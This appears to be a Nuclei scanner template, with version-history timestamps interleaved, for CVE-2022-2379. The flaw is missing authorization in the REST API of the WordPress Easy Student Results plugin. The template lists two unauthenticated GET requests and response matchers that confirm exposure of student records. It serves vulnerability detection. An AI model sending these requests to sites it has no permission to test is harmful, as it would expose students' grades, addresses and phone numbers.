2022-11-09 14:18:37 +00:00
id : CVE-2022-2379
info :
2023-04-10 20:33:01 +00:00
name : WordPress Easy Student Results <=2.2.8 - Improper Authorization
2022-11-09 14:18:37 +00:00
author : theamanrawat
severity : high
description : |
2023-04-07 16:03:29 +00:00
WordPress Easy Student Results plugin through 2.2.8 is susceptible to information disclosure. The plugin lacks authorization in its REST API, which can allow an attacker to retrieve sensitive information related to courses, exams, and departments, as well as student grades and information such as email address, physical address, and phone number.
2022-11-09 14:18:37 +00:00
reference :
- https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6
- https://wordpress.org/plugins/easy-student-results/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2379
2022-11-10 16:25:24 +00:00
classification :
2022-11-14 09:41:13 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-11-10 16:25:24 +00:00
cve-id : CVE-2022-2379
2022-11-14 09:41:13 +00:00
cwe-id : CWE-862
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:*:*:*
epss-score : 0.0257
2022-11-10 16:25:24 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2022-11-14 09:41:13 +00:00
verified : "true"
tags : wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022
2022-11-09 14:18:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-11-09 14:18:37 +00:00
- raw :
- |
GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1
Host : {{Hostname}}
- |
GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1
Host : {{Hostname}}
2022-11-10 16:25:24 +00:00
stop-at-first-match : true
2022-11-09 14:18:37 +00:00
req-condition : true
2022-11-10 16:25:24 +00:00
matchers-condition : and
2022-11-09 14:18:37 +00:00
matchers :
- type : word
2022-11-10 16:25:24 +00:00
part : body_1
2022-11-09 14:18:37 +00:00
words :
2022-11-10 16:25:24 +00:00
- '"departments":'
2022-11-09 14:18:37 +00:00
- 'batches":'
condition : and
- type : word
part : body_2
words :
- 'meta_data'
2022-11-10 16:25:24 +00:00
- '"name":"'
- '"registration_no":'
2022-11-09 14:18:37 +00:00
condition : and
- type : word
part : header
words :
- application/json
- type : status
status :
2022-11-10 16:25:24 +00:00
- 200
2023-04-07 16:03:29 +00:00
2023-04-10 20:33:01 +00:00
# Enhanced by cs on 2023/04/10